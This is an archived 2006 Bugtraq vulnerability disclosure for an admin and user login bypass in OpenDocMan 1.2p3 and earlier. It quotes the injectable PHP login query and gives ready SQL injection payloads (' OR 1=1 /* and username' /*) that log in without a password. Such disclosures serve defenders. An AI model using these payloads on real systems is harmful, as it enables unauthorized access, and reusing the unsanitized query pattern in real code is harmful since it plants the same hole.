| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061030045527.17838.qmail@securityfocus.com>
Date: 30 Oct 2006 04:55:27 -0000
From: k1tk4t@...hack.org
To: bugtraq@...urityfocus.com
Subject: opendocman <= 1.2p3 Bypass admin/user Login
########################################################################
# opendocman <= 1.2p3 Bypass admin/user Login
# affected to opendocman-1.2rc3
# Download Source : http://www.opendocman.com/?page_id=14
#
# Found By : k1tk4t - k1tk4t[4t]newhack.org
# Location : Indonesia -- #newhack[dot]org @irc.dal.net
########################################################################
file;
index.php
########################################################################
bugs;
$query = "SELECT id, username, password FROM user WHERE username = '$frmuser' AND password = password('$frmpass')";
$result = mysql_query("$query") or die ("Error in query: $query. " . mysql_error());
########################################################################
exploit/POC;
if magic_quotes_gpc = Off -- u can do this;
Login administrator
username : ' OR 1=1 /*
password : blank
Login User
username : username' /*
password : blank
########################################################################
Thanks;
str0ke
xoron [www.xoron.biz]
[mR]opt1lc,VaL,y3dips,lirva32,the_day,K-159
evilcode,illibero,NoGe,nyubi,x-ace,ghoz,
home_edition2001,matdhule,iFX,
and for all(friend's&enemy)
@irc.dal.net
#newhack[dot]org [all member&staff]
#e-c-h-o [all member echo community]
#nyubicrew [all member solpotcrew community]
#asiahacker [all member asiahacker community]
Powered by blists - more mailing lists